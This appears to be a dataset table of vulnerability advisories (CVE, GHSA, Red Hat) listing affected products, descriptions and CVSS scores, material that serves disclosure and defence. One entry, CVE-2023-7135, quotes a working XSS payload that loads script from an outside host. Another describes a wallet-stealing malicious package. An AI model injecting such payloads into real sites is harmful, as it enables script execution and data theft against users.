id stringlengths 12 45 | title stringlengths 0 256 ⌀ | description stringlengths 3 189k | cpes listlengths 0 5.42k | cvss_v4_0 float64 0 10 ⌀ | cvss_v3_1 float64 0 10 ⌀ | cvss_v3_0 float64 0 10 ⌀ | cvss_v2_0 float64 0 10 ⌀ | patch_commit_url stringlengths 36 232 ⌀ |
|---|---|---|---|---|---|---|---|---|
CVE-2008-5989 | Directory traversal vulnerability in defs.php in PHPcounter 1.3.2 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the l parameter. | [
"cpe:2.3:a:phpcounter:phpcounter:*:*:*:*:*:*:*:*",
"cpe:2.3:a:phpcounter:phpcounter:1.2.0:*:*:*:*:*:*:*",
"cpe:2.3:a:phpcounter:phpcounter:1.2.1:*:*:*:*:*:*:*",
"cpe:2.3:a:phpcounter:phpcounter:1.2.2:*:*:*:*:*:*:*",
"cpe:2.3:a:phpcounter:phpcounter:1.2.3:*:*:*:*:*:*:*",
"cpe:2.3:a:phpcounter:phpcounter:1.2.4:*:*:*:*:*:*:*",
"cpe:2.3:a:phpcounter:phpcounter:1.2.5:*:*:*:*:*:*:*",
"cpe:2.3:a:phpcounter:phpcounter:1.2.6:*:*:*:*:*:*:*",
"cpe:2.3:a:phpcounter:phpcounter:1.2.7:*:*:*:*:*:*:*",
"cpe:2.3:a:phpcounter:phpcounter:1.3.0:*:*:*:*:*:*:*",
"cpe:2.3:a:phpcounter:phpcounter:1.3.1:*:*:*:*:*:*:*"
] | null | null | null | 6.8 | null | |
CVE-2024-6243 | HTML Forms < 1.3.33 - Admin+ Stored XSS | The HTML Forms WordPress plugin before 1.3.33 does not sanitize and escape the form message inputs, allowing high-privilege users, such as administrators, to perform Stored Cross-Site Scripting (XSS) attacks even when the unfiltered_html capability is disabled. | [
"cpe:2.3:a:htmlforms:html_forms:*:*:*:*:*:*:*:*",
"cpe:2.3:a:ibericode:html_forms:*:*:*:*:*:wordpress:*:*"
] | null | 5.9 | null | null | null |
CVE-2025-3682 | PCMan FTP Server PASV Command buffer overflow | A vulnerability was found in PCMan FTP Server 2.0.7. It has been classified as critical. This affects an unknown part of the component PASV Command Handler. The manipulation leads to buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | [] | 6.9 | 7.3 | 7.3 | 7.5 | null |
CVE-2023-47616 | A CWE-200: Exposure of Sensitive Information to an Unauthorized Actor vulnerability exists in Telit Cinterion BGS5, Telit Cinterion EHS5/6/8, Telit Cinterion PDS5/6/8, Telit Cinterion ELS61/81, Telit Cinterion PLS62 that could allow an attacker with physical access to the target system to get access to a sensitive data on the targeted system. | [
"cpe:2.3:o:telit:bgs5_firmware:-:*:*:*:*:*:*:*",
"cpe:2.3:h:telit:bgs5:-:*:*:*:*:*:*:*",
"cpe:2.3:o:telit:ehs5_firmware:-:*:*:*:*:*:*:*",
"cpe:2.3:h:telit:ehs5:-:*:*:*:*:*:*:*",
"cpe:2.3:o:telit:ehs6_firmware:-:*:*:*:*:*:*:*",
"cpe:2.3:h:telit:ehs6:-:*:*:*:*:*:*:*",
"cpe:2.3:o:telit:ehs8_firmware:-:*:*:*:*:*:*:*",
"cpe:2.3:h:telit:ehs8:-:*:*:*:*:*:*:*",
"cpe:2.3:o:telit:pds5_firmware:-:*:*:*:*:*:*:*",
"cpe:2.3:h:telit:pds5:-:*:*:*:*:*:*:*",
"cpe:2.3:o:telit:pds6_firmware:-:*:*:*:*:*:*:*",
"cpe:2.3:h:telit:pds6:-:*:*:*:*:*:*:*",
"cpe:2.3:o:telit:pds8_firmware:-:*:*:*:*:*:*:*",
"cpe:2.3:h:telit:pds8:-:*:*:*:*:*:*:*",
"cpe:2.3:o:telit:els61_firmware:-:*:*:*:*:*:*:*",
"cpe:2.3:h:telit:els61:-:*:*:*:*:*:*:*",
"cpe:2.3:o:telit:els81_firmware:-:*:*:*:*:*:*:*",
"cpe:2.3:h:telit:els81:-:*:*:*:*:*:*:*",
"cpe:2.3:o:telit:pls62_firmware:-:*:*:*:*:*:*:*",
"cpe:2.3:h:telit:pls62:-:*:*:*:*:*:*:*"
] | null | 2.4 | null | null | null | |
RHSA-2023:5933 | Red Hat Security Advisory: Openshift Secondary Scheduler Operator 1.1.3 security update | golang: net/http: insufficient sanitization of Host header golang: crypto/tls: slow verification of certificate chains containing large RSA keys golang: net/http, x/net/http2: rapid stream resets can cause excessive work (CVE-2023-44487) HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) | [
"cpe:/a:redhat:openshift_secondary_scheduler:1.1::el8"
] | null | 7.5 | null | null | null |
CVE-2005-4338 | announcement.pl in Blackboard Learning and Community Portal System in Academic Suite 6.3.1.424, 6.2.3.23, and other versions before 6 allows remote attackers to gain administrator privileges by setting the context parameter to "admin". | [
"cpe:2.3:a:blackboard:academic_suite:*:*:*:*:*:*:*:*",
"cpe:2.3:a:blackboard:academic_suite:6.2.3.23:*:*:*:*:*:*:*",
"cpe:2.3:a:blackboard:academic_suite:6.3.1.424:*:*:*:*:*:*:*"
] | null | null | null | 10 | null | |
CVE-2020-2278 | Jenkins Storable Configs Plugin 1.0 and earlier does not restrict the user-specified file name, allowing attackers with Job/Configure permission to replace any other '.xml' file on the Jenkins controller with a job config.xml file's content. | [
"cpe:2.3:a:jenkins:storable_configs:*:*:*:*:*:jenkins:*:*"
] | null | 6.5 | null | 4 | null | |
GHSA-pfw8-43jj-c4g3 | Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 2.6.0-pl2 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the PmaAbsoluteUri parameter, (2) the zero_rows parameter in read_dump.php, (3) the confirm form, or (4) an error message generated by the internal phpMyAdmin parser. | [] | null | null | null | null | null | |
GHSA-6r3w-c7h6-wfhg | The Treck TCP/IP stack before 6.0.1.66 has an IPv6 Out-of-bounds Read. | [] | null | 5.4 | null | null | null | |
GHSA-q5mv-5g22-rg38 | Windows Portable Device Enumerator Service Security Feature Bypass Vulnerability. | [] | null | 6.6 | null | null | null | |
GHSA-7cf8-v985-h6fc | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NotFound OK Poster Group allows Reflected XSS. This issue affects OK Poster Group: from n/a through 1.1. | [] | null | 7.1 | null | null | null | |
CVE-2010-5023 | SQL injection vulnerability in index.asp in Digital Interchange Calendar 5.8.5 allows remote attackers to execute arbitrary SQL commands via the intDivisionID parameter. | [
"cpe:2.3:a:cramerdev:digital_interchange_calendar:5.8.5:*:*:*:*:*:*:*"
] | null | null | null | 7.5 | null | |
RHSA-2025:23235 | Red Hat Security Advisory: rsync security update | rsync: Path traversal vulnerability in rsync | [
"cpe:/a:redhat:rhel_e4s:9.2::appstream",
"cpe:/o:redhat:rhel_e4s:9.2::baseos"
] | null | 6.5 | null | null | null |
CVE-2024-58045 | Multi-concurrency vulnerability in the media digital copyright protection module
Impact: Successful exploitation of this vulnerability may affect availability. | [] | null | 8.6 | null | null | null | |
GHSA-hhg8-rc52-c9mv | The WP Test Email plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.1.7. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | [] | null | 6.1 | null | null | null | |
CVE-2020-5991 | NVIDIA CUDA Toolkit, all versions prior to 11.1.1, contains a vulnerability in the NVJPEG library in which an out-of-bounds read or write operation may lead to code execution, denial of service, or information disclosure. | [
"cpe:2.3:a:nvidia:cuda_toolkit:*:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*"
] | null | 7.8 | null | 4.6 | null | |
GHSA-h6c3-73mq-5cp9 | The Elementor Website Builder – More than Just a Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘url’ parameter of the Icon widget in all versions up to, and including, 3.25.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | [] | null | 6.4 | null | null | null | |
GHSA-85q4-v37c-wfpc | Malicious Package in bitcion-ops | All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.RecommendationAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. | [] | null | 9.1 | null | null | null |
CVE-2006-4230 | Multiple PHP remote file inclusion vulnerabilities in index.php in Lizge V.20 Web Portal allow remote attackers to execute arbitrary PHP code via a URL in the (1) lizge or (2) bade parameters. | [
"cpe:2.3:a:lizge:lizge_web_portal:0.20:*:*:*:*:*:*:*"
] | null | null | null | 7.5 | null | |
GHSA-46f9-rmg7-hh9m | Wondershare filmora 9.2.11 is affected by Trojan Dll hijacking leading to privilege escalation. | [] | null | 7.8 | null | null | null | |
GHSA-fj8f-56wc-q36r | rabbitmq-connector plugin module in Apache EventMesh platforms allows attackers to send controlled message | CWE-502 Deserialization of Untrusted Data at the rabbitmq-connector plugin module in Apache EventMesh (incubating) V1.7.0\V1.8.0 on windows\linux\mac os e.g. platforms allows attackers to send controlled message andremote code execute via rabbitmq messages. Users can use the code under the master branch in project repo to fix this issue, the new version is set to be released as soon as possible. | [] | null | 9.8 | null | null | null |
CVE-2006-1970 | Cross-site scripting (XSS) vulnerability in classifieds/viewcat.cgi in KCScripts Classifieds, distributed individually and as part of Portal Pack 6.0 and earlier, allows remote attackers to inject arbitrary web script or HTML via the cat_id parameter. | [
"cpe:2.3:a:kcscripts:portal_pack:*:*:*:*:*:*:*:*"
] | null | null | null | 4.3 | null | |
RHSA-2017:2832 | Red Hat Security Advisory: nss security update | nss: Potential use-after-free in TLS 1.2 server when verifying client authentication | [
"cpe:/o:redhat:enterprise_linux:6::client",
"cpe:/o:redhat:enterprise_linux:6::computenode",
"cpe:/o:redhat:enterprise_linux:6::server",
"cpe:/o:redhat:enterprise_linux:6::workstation",
"cpe:/o:redhat:enterprise_linux:7::client",
"cpe:/o:redhat:enterprise_linux:7::computenode",
"cpe:/o:redhat:enterprise_linux:7::server",
"cpe:/o:redhat:enterprise_linux:7::workstation"
] | null | null | 7.5 | null | null |
GHSA-f7w6-w5p4-76pj | The Debian installer for the (1) shadow 4.0.14 and (2) base-config 2.53.10 packages includes sensitive information in world-readable log files, including preseeded passwords and pppoeconf passwords, which might allow local users to gain privileges. | [] | null | null | null | null | null | |
CVE-2018-0640 | Buffer overflow in Aterm HC100RC Ver1.0.1 and earlier allows attacker with administrator rights to execute arbitrary code via netWizard.cgi date parameter, time parameter, and offset parameter. | [
"cpe:2.3:o:nec:aterm_hc100rc_firmware:*:*:*:*:*:*:*:*",
"cpe:2.3:h:nec:aterm_hc100rc:-:*:*:*:*:*:*:*"
] | null | null | 7.2 | 6.5 | null | |
GHSA-2r24-5j8r-cf83 | In the Linux kernel, the following vulnerability has been resolved:tracefs: Reset permissions on remount if permissions are optionsThere's an inconsistency with the way permissions are handled in tracefs.
Because the permissions are generated when accessed, they default to the
root inode's permission if they were never set by the user. If the user
sets the permissions, then a flag is set and the permissions are saved via
the inode (for tracefs files) or an internal attribute field (for
eventfs).But if a remount happens that specify the permissions, all the files that
were not changed by the user gets updated, but the ones that were are not.
If the user were to remount the file system with a given permission, then
all files and directories within that file system should be updated.This can cause security issues if a file's permission was updated but the
admin forgot about it. They could incorrectly think that remounting with
permissions set would update all files, but miss some.For example:cd /sys/kernel/tracingchgrp 1002 current_tracerls -l[..]
-rw-r----- 1 root root 0 May 1 21:25 buffer_size_kb
-rw-r----- 1 root root 0 May 1 21:25 buffer_subbuf_size_kb
-r--r----- 1 root root 0 May 1 21:25 buffer_total_size_kb
-rw-r----- 1 root lkp 0 May 1 21:25 current_tracer
-rw-r----- 1 root root 0 May 1 21:25 dynamic_events
-r--r----- 1 root root 0 May 1 21:25 dyn_ftrace_total_info
-r--r----- 1 root root 0 May 1 21:25 enabled_functionsWhere current_tracer now has group "lkp".mount -o remount,gid=1001 .ls -l-rw-r----- 1 root tracing 0 May 1 21:25 buffer_size_kb
-rw-r----- 1 root tracing 0 May 1 21:25 buffer_subbuf_size_kb
-r--r----- 1 root tracing 0 May 1 21:25 buffer_total_size_kb
-rw-r----- 1 root lkp 0 May 1 21:25 current_tracer
-rw-r----- 1 root tracing 0 May 1 21:25 dynamic_events
-r--r----- 1 root tracing 0 May 1 21:25 dyn_ftrace_total_info
-r--r----- 1 root tracing 0 May 1 21:25 enabled_functionsEverything changed but the "current_tracer".Add a new link list that keeps track of all the tracefs_inodes which has
the permission flags that tell if the file/dir should use the root inode's
permission or not. Then on remount, clear all the flags so that the
default behavior of using the root inode's permission is done for all
files and directories. | [] | null | 7.8 | null | null | null | |
CVE-2019-5451 | Bypass lock protection in the Nextcloud Android app prior to version 3.6.1 allows accessing the files when repeatedly opening and closing the app in a very short time. | [
"cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:*:android:*:*"
] | null | 4.6 | null | 2.1 | null | |
GHSA-wfc5-6r3q-mv26 | Unspecified vulnerability in the error handler in Hitachi Web Page Generator and Web Page Generator Enterprise 4.01 and earlier, when using the default error template and debug mode is set to ON, allows remote attackers to determine internal directory structures via unknown attack vectors. | [] | null | null | null | null | null | |
CVE-2010-1121 | Mozilla Firefox 3.6.x before 3.6.3 does not properly manage the scopes of DOM nodes that are moved from one document to another, which allows remote attackers to conduct use-after-free attacks and execute arbitrary code via unspecified vectors involving improper interaction with garbage collection, as demonstrated by Nils during a Pwn2Own competition at CanSecWest 2010. | [
"cpe:2.3:a:mozilla:firefox:3.6:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:firefox:3.6.1:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:firefox:3.6.2:*:*:*:*:*:*:*"
] | null | null | null | 10 | null | |
GHSA-qg6p-6xqq-gh7c | Integer overflow in Firebird SQL 1.0.3 and earlier, 1.5.x before 1.5.6, 2.0.x before 2.0.4, and 2.1.x before 2.1.0 RC1 might allow remote attackers to execute arbitrary code via crafted (1) op_receive, (2) op_start, (3) op_start_and_receive, (4) op_send, (5) op_start_and_send, and (6) op_start_send_and_receive XDR requests, which triggers memory corruption. | [] | null | null | null | null | null | |
GHSA-rvjq-cgm3-hvq9 | The Logo Showcase Ultimate – Logo Carousel, Logo Slider & Logo Grid plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.3.8 via deserialization via shortcode of untrusted input. This makes it possible for authenticated attackers, with contributor access and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. | [] | null | 7.5 | null | null | null | |
CVE-2025-14599 | Quartus® Prime Standard and Quartus® Prime Lite Security Advisory | Uncontrolled Search Path Element vulnerability in Altera Quartus Prime Standard
Installer (SFX)
on Windows, Altera Quartus Prime Lite
Installer (SFX)
on Windows allows Search Order Hijacking.This issue affects Quartus Prime Standard: from 23.1 through 24.1; Quartus Prime Lite: from 23.1 through 24.1. | [] | 5.4 | 6.7 | null | null | null |
GHSA-hhpx-68fp-4gm4 | An insecure, direct object vulnerability in hunting/fishing license retrieval function of the "Fish | Hunt FL" iOS app versions 3.8.0 and earlier allows a remote authenticated attacker to retrieve other people's personal information and images of their hunting/fishing licenses. | [] | null | 4.3 | null | null | null | |
CVE-2025-15366 | IMAP command injection in user-controlled commands | The imaplib module, when passed a user-controlled command, can have additional commands injected using newlines. Mitigation rejects commands containing control characters. | [] | 5.9 | null | null | null | https://github.com/python/cpython/pull/143922 |
GHSA-gjjr-423g-hm3j | In SWFTools 0.9.2, the wav_convert2mono function in lib/wav.c does not properly restrict a multiplication within a malloc call, which allows remote attackers to cause a denial of service (integer overflow and NULL pointer dereference) via a crafted WAV file. | [] | null | null | 5.5 | null | null | |
GHSA-h2ww-p8c6-6v58 | Dnsmasq 2.86 has a heap-based buffer overflow in dhcp_reply (called from dhcp_packet and FuzzDhcp). | [] | null | 9.8 | null | null | null | |
CVE-2024-38473 | Apache HTTP Server proxy encoding problem | Encoding problem in mod_proxy in Apache HTTP Server 2.4.59 and earlier allows request URLs with incorrect encoding to be sent to backend services, potentially bypassing authentication via crafted requests.
Users are recommended to upgrade to version 2.4.60, which fixes this issue. | [
"cpe:2.3:a:apache_software_foundation:apache_http_server:*:*:*:*:*:*:*:*"
] | null | 8.1 | null | null | null |
GHSA-2586-f3p4-hq84 | LightGBM Remote Code Execution Vulnerability | LightGBM Remote Code Execution Vulnerability | [] | null | 8.1 | null | null | null |
CVE-2018-1929 | IBM Rational Engineering Lifecycle Manager 5.0 through 6.0.6 could allow a malicious user to be allowed to view any view if he knows the URL link of a the view, and access information that should not be able to see. IBM X-Force ID: 153120. | [
"cpe:2.3:a:ibm:rational_engineering_lifecycle_manager:*:*:*:*:*:*:*:*"
] | null | null | 4.3 | null | null | |
CVE-2021-28906 | In function read_yin_leaf() in libyang <= v1.0.225, it doesn't check whether the value of retval->ext[r] is NULL. In some cases, it can be NULL, which leads to the operation of retval->ext[r]->flags that results in a crash. | [
"cpe:2.3:a:cesnet:libyang:*:*:*:*:*:*:*:*"
] | null | 7.5 | null | 5 | null | |
GHSA-q3mg-hh3m-f7pm | A CWE-862 "Missing Authorization" in maxprofile/users/routes.lua (users endpoint) in Q-Free MaxTime less than or equal to version 2.11.0 allows an authenticated (low-privileged) attacker to enumerate users via crafted HTTP requests. | [] | null | 6.5 | null | null | null | |
GHSA-8w7v-wg9w-c7jm | Cross-Site Request Forgery (CSRF) vulnerability in Soft8Soft LLC Verge3D allows Cross Site Request Forgery. This issue affects Verge3D: from n/a through 4.8.2. | [] | null | 4.3 | null | null | null | |
CVE-2022-32481 | Dell PowerProtect Cyber Recovery, versions prior to 19.11, contain a privilege escalation vulnerability on virtual appliance deployments. A lower-privileged authenticated user can chain docker commands to escalate privileges to root leading to complete system takeover. | [
"cpe:2.3:a:dell:powerprotect_cyber_recovery:*:*:*:*:*:*:*:*"
] | null | 7.8 | null | null | null | |
CVE-2022-28656 | is_closing_session() allows users to consume RAM in the Apport process | [
"cpe:2.3:a:apport_project:apport:*:*:*:*:*:*:*:*",
"cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:esm:*:*:*",
"cpe:2.3:o:canonical:ubuntu_linux:20.04:*:*:*:lts:*:*:*",
"cpe:2.3:o:canonical:ubuntu_linux:21.10:*:*:*:-:*:*:*",
"cpe:2.3:o:canonical:ubuntu_linux:22.04:*:*:*:lts:*:*:*"
] | null | 5.5 | null | null | null | |
CVE-2018-9120 | In Crea8social 2018.2, there is Stored Cross-Site Scripting via a post. | [
"cpe:2.3:a:crea8social:crea8social:2018.2:*:*:*:*:*:*:*"
] | null | null | 5.4 | 3.5 | null | |
GHSA-8xg4-xq2v-v6j7 | Multiple vulnerabilities allow bypassing path filtering of agent-to-controller access control in Jenkins | The agent-to-controller security subsystem limits which files on the Jenkins controller can be accessed by agent processes.Multiple vulnerabilities in the file path filtering implementation of Jenkins 2.318 and earlier, LTS 2.303.2 and earlier allow agent processes to read and write arbitrary files on the Jenkins controller file system, and obtain some information about Jenkins controller file systems.SECURITY-2538 / CVE-2021-21692: The operations `FilePath#renameTo` and `FilePath#moveAllChildrenTo` only check read permission on the source path.We expect that most of these vulnerabilities have been present since [SECURITY-144 was addressed in the 2014-10-30 security advisory](https://www.jenkins.io/security/advisory/2014-10-30/).Jenkins 2.319, LTS 2.303.3 addresses these security vulnerabilities.SECURITY-2538 / CVE-2021-21692: The operations `FilePath#renameTo` and `FilePath#moveAllChildrenTo` check both read and delete permissions on the source path.As some common operations are now newly subject to access control, it is expected that plugins sending commands from agents to the controller may start failing. Additionally, the newly introduced path canonicalization means that instances using a custom builds directory ([Java system property jenkins.model.Jenkins.buildsDir](https://www.jenkins.io/doc/book/managing/system-properties/#jenkins-model-jenkins-buildsdir)) or partitioning `JENKINS_HOME` using symbolic links may fail access control checks. See [the documentation](https://www.jenkins.io/doc/book/security/controller-isolation/agent-to-controller/#file-access-rules) for how to customize the configuration in case of problems.If you are unable to immediately upgrade to Jenkins 2.319, LTS 2.303.3, you can install the [Remoting Security Workaround Plugin](https://www.jenkins.io/redirect/remoting-security-workaround/). It will prevent all agent-to-controller file access using `FilePath` APIs. Because it is more restrictive than Jenkins 2.319, LTS 2.303.3, more plugins are incompatible with it. Make sure to read the plugin documentation before installing it. | [] | null | 9 | null | null | null |
CVE-2025-31789 | WordPress TextMe SMS plugin <= 1.9.1 - Broken Access Control vulnerability | Missing Authorization vulnerability in Matat Technologies TextMe SMS allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects TextMe SMS: from n/a through 1.9.1. | [] | null | 6.5 | null | null | null |
GHSA-4465-r2hg-v4rj | CiviCRM SQL injection vulnerability via Quick Search API | The Quick Search API in CiviCRM 4.2.0 through 4.2.9 and 4.3.0 through 4.3.3 allows remote authenticated users to bypass the validation layer and conduct SQL injection attacks via a direct request to the "second layer" of the API, related to contact.getquick. | [] | null | null | null | null | null |
CVE-2004-1714 | BlackICE PC Protection and Server Protection installs (1) firewall.ini, (2) blackice.ini, (3) sigs.ini and (4) protect.ini with Everyone Full Control permissions, which allows local users to cause a denial of service (crash) or modify configuration, as demonstrated by modifying firewall.ini to contain a large firewall rule. | [
"cpe:2.3:a:iss:blackice_pc_protection:3.6cbd:*:*:*:*:*:*:*",
"cpe:2.3:a:iss:blackice_pc_protection:3.6cbr:*:*:*:*:*:*:*",
"cpe:2.3:a:iss:blackice_pc_protection:3.6cbz:*:*:*:*:*:*:*",
"cpe:2.3:a:iss:blackice_pc_protection:3.6cca:*:*:*:*:*:*:*",
"cpe:2.3:a:iss:blackice_pc_protection:3.6ccb:*:*:*:*:*:*:*",
"cpe:2.3:a:iss:blackice_pc_protection:3.6ccc:*:*:*:*:*:*:*",
"cpe:2.3:a:iss:blackice_pc_protection:3.6ccd:*:*:*:*:*:*:*",
"cpe:2.3:a:iss:blackice_pc_protection:3.6cce:*:*:*:*:*:*:*",
"cpe:2.3:a:iss:blackice_pc_protection:3.6ccf:*:*:*:*:*:*:*",
"cpe:2.3:a:iss:blackice_pc_protection:3.6ccg:*:*:*:*:*:*:*",
"cpe:2.3:a:iss:blackice_server_protection:3.5cdf:*:*:*:*:*:*:*",
"cpe:2.3:a:iss:blackice_server_protection:3.6cbz:*:*:*:*:*:*:*",
"cpe:2.3:a:iss:blackice_server_protection:3.6cca:*:*:*:*:*:*:*",
"cpe:2.3:a:iss:blackice_server_protection:3.6ccb:*:*:*:*:*:*:*",
"cpe:2.3:a:iss:blackice_server_protection:3.6ccc:*:*:*:*:*:*:*",
"cpe:2.3:a:iss:blackice_server_protection:3.6ccd:*:*:*:*:*:*:*",
"cpe:2.3:a:iss:blackice_server_protection:3.6cce:*:*:*:*:*:*:*",
"cpe:2.3:a:iss:blackice_server_protection:3.6ccf:*:*:*:*:*:*:*",
"cpe:2.3:a:iss:blackice_server_protection:3.6ccg:*:*:*:*:*:*:*",
"cpe:2.3:a:iss:blackice_server_protection:3.6cch:*:*:*:*:*:*:*",
"cpe:2.3:a:iss:blackice_server_protection:3.6cno:*:*:*:*:*:*:*"
] | null | 7.1 | null | 2.1 | null | |
GHSA-25q8-wqrc-rrrr | SQL injection vulnerability in reward_points.post.php in the Reward points addon in CS-Cart before 2.0.6 allows remote authenticated users to execute arbitrary SQL commands via the sort_order parameter in a reward_points.userlog action to index.php, a different vulnerability than CVE-2005-4429.2. | [] | null | null | null | null | null | |
GHSA-7m4h-4frj-xvm5 | An issue was discovered in dreamer_cms 4.1.3. There is a CSRF vulnerability that can delete a theme project via /admin/category/delete. | [] | null | 4.3 | null | null | null | |
GHSA-34w3-rhpm-qv77 | The ProfileGrid – User Profiles, Groups and Communities plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 5.9.3.2 due to incorrect use of the wp_kses_allowed_html function, which allows the 'onclick' attribute for certain HTML elements without sufficient restriction or context validation. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | [] | null | 6.4 | null | null | null | |
GHSA-q9mh-p233-5pvv | A flaw was found in Samba. Samba AD users can cause the server to access uninitialized data with an LDAP add or modify the request, usually resulting in a segmentation fault. | [] | null | 8.1 | null | null | null | |
GHSA-4768-g35x-83q9 | Multiple unspecified vulnerabilities in the (1) decode_band_hdr function in indeo4.c and (2) ff_ivi_decode_blocks function in ivi_common.c in libavcodec/ in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.5, have unknown impact and attack vectors, related to the "transform size." | [] | null | null | null | null | null | |
GHSA-5xgh-643p-cp2g | Cross-site Scripting in yapi-vendor | An issue was discovered in YMFE YApi 1.3.23. There is stored XSS in the name field of a project. | [] | null | null | 5.4 | null | null |
CVE-2006-7010 | The mosgetparam implementation in Joomla! before 1.0.10, does not set a variable's data type to integer when the variable's default value is numeric, which has unspecified impact and attack vectors, which may permit SQL injection attacks. | [
"cpe:2.3:a:joomla:joomla:1.0.0:*:*:*:*:*:*:*",
"cpe:2.3:a:joomla:joomla:1.0.1:*:*:*:*:*:*:*",
"cpe:2.3:a:joomla:joomla:1.0.2:*:*:*:*:*:*:*",
"cpe:2.3:a:joomla:joomla:1.0.3:*:*:*:*:*:*:*",
"cpe:2.3:a:joomla:joomla:1.0.4:*:*:*:*:*:*:*",
"cpe:2.3:a:joomla:joomla:1.0.5:*:*:*:*:*:*:*",
"cpe:2.3:a:joomla:joomla:1.0.6:*:*:*:*:*:*:*",
"cpe:2.3:a:joomla:joomla:1.0.7:*:*:*:*:*:*:*",
"cpe:2.3:a:joomla:joomla:1.0.8:*:*:*:*:*:*:*",
"cpe:2.3:a:joomla:joomla:1.0.9:*:*:*:*:*:*:*"
] | null | null | null | 7.5 | null | |
GHSA-v7m5-jjhm-hp24 | Multiple off-by-one buffer overflows in the IMAP capability for Mutt 1.3.28 and earlier, and Balsa 1.2.4 and earlier, allow a remote malicious IMAP server to cause a denial of service (crash) and possibly execute arbitrary code via a specially crafted mail folder, a different vulnerability than CVE-2003-0140. | [] | null | null | null | null | null | |
CVE-2025-4675 | Improper implementation of Modbus protocol leading to DOS attack | Improper Check for Unusual or Exceptional Conditions vulnerability in ABB WebPro SNMP Card PowerValue, ABB WebPro SNMP Card PowerValue UL.This issue affects WebPro SNMP Card PowerValue: through 1.1.8.K; WebPro SNMP Card PowerValue UL: through 1.1.8.K. | [] | 7.1 | 6.5 | null | null | null |
GHSA-xc32-mq6r-3364 | D-Link DIR-859 A1 1.05 was discovered to contain a command injection vulnerability via the service= variable in the soapcgi_main function. | [] | null | 9.8 | null | null | null | |
CVE-2023-7135 | code-projects Record Management System Offices offices.php cross site scripting | A vulnerability classified as problematic has been found in code-projects Record Management System 1.0. Affected is an unknown function of the file /main/offices.php of the component Offices Handler. The manipulation of the argument officename with the input "><script src="https://js.rip/b23tmbxf49"></script> leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249138 is the identifier assigned to this vulnerability. | [
"cpe:2.3:a:code-projects:record_management_system:1.0:*:*:*:*:*:*:*"
] | null | 2.4 | 2.4 | 3.3 | null |
CVE-2021-26828 | OpenPLC ScadaBR through 0.9.1 on Linux and through 1.12.4 on Windows allows remote authenticated users to upload and execute arbitrary JSP files via view_edit.shtm. | [
"cpe:2.3:a:openplcproject:scadabr:*:*:*:*:*:linux:*:*",
"cpe:2.3:a:openplcproject:scadabr:*:*:*:*:*:windows:*:*"
] | null | 8.8 | null | 6.5 | null | |
GHSA-h999-rj96-9q7g | The ATOK application before 1.0.4 for Android allows remote attackers to read the learning information file, and obtain sensitive input-string information, via a crafted application. | [] | null | null | null | null | null | |
RHSA-2014:1891 | Red Hat Security Advisory: Red Hat JBoss BRMS 6.0.3 security update | CXF: SSL hostname verification bypass, incomplete CVE-2012-5783 fix CXF: SSL hostname verification bypass, incomplete CVE-2012-6153 fix | [
"cpe:/a:redhat:jboss_brms:6.0"
] | null | null | 4.8 | null | null |
CVE-2020-6369 | SAP Solution Manager and SAP Focused Run (update provided in WILY_INTRO_ENTERPRISE 9.7, 10.1, 10.5, 10.7), allows an unauthenticated attackers to bypass the authentication if the default passwords for Admin and Guest have not been changed by the administrator.This may impact the confidentiality of the service. | [
"cpe:2.3:a:sap:focused_run:9.7:*:*:*:*:*:*:*",
"cpe:2.3:a:sap:focused_run:10.1:*:*:*:*:*:*:*",
"cpe:2.3:a:sap:focused_run:10.5:*:*:*:*:*:*:*",
"cpe:2.3:a:sap:focused_run:10.7:*:*:*:*:*:*:*",
"cpe:2.3:a:sap:solution_manager:9.7:*:*:*:*:*:*:*",
"cpe:2.3:a:sap:solution_manager:10.1:*:*:*:*:*:*:*",
"cpe:2.3:a:sap:solution_manager:10.5:*:*:*:*:*:*:*",
"cpe:2.3:a:sap:solution_manager:10.7:*:*:*:*:*:*:*"
] | null | null | 7.5 | null | null | |
CVE-2024-4970 | Widget Bundle <= 2.0.0 - Admin+ Stored XSS | The Widget Bundle WordPress plugin through 2.0.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) | [
"cpe:2.3:a:devnath_verma:widget_bundle:*:*:*:*:*:wordpress:*:*"
] | null | 6.1 | null | null | null |
